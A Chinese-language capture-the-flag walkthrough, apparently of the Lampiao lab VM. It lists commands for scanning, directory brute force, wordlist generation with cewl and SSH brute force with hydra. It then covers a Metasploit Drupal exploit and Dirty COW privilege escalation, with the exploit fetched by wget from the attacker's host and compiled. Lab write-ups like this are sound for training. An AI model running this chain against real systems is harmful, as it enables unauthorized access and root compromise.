信息收集
arp-scan -l
namp 192.168.19.0/24
nmap -p- 192.168.19.144
访问80端口,没有任何信息
访问1898端口,发现了一个登录页面
爆破一下目录
dirb 192.168.19.144:1898
获得url:http://192.168.19.144:1898/robots.txt
robots.txt文件在很多网站都有,里面会有一些泄露信息,可以多关注
发现文件http://192.168.19.144:1898/CHANGELOG.txt
cms框架为Drupal 7.54, 2017-02-01
没发现什么有用的信息,回到登录页面,点点看看有没有别的信息,点击标题时发现url上面有页数,输入别的数字尝试一下。
输入2,发现一个音频和一个图片
音频用google可以打开,提示一个人名tiago
图片扫码得到提示尝试用hydra爆破
使用博客类密码字典生成工具cewl(通过爬取网站关键信息创建一个密码字典)
cewl http://192.168.19.144:1898/?q=node/1 -w lampiao.txt
第一种拿shell
根据之前开放的端口有22端口
使用hydra进行爆破
hydra -l tiago -P lampiao.txt 192.168.19.144 ssh
账号tiago 密码Virgulino
ssh tiago@192.168.19.144
连接到ssh服务,获取一个低权限用户
第二种拿shell
根据之前发现版本drupal
打开msf
msfconsole
search drupal
use 1 用2018-03-28那个
show options 查看里面所需要设置的参数
set rport 1898
set rhosts 192.168.19.144
exploit
shell
脏牛提权
search dirty
找到40847.c文件
开启一个简易的python服务,用刚才获取的shell来下载40847.c文件
wget http://192.168.19.147:8081/40847.cpp
编译一下
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o lampiao 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o lampiao gcc生成的目标文件,名字为lampiao
执行gcc编译可执行文件,可直接提权。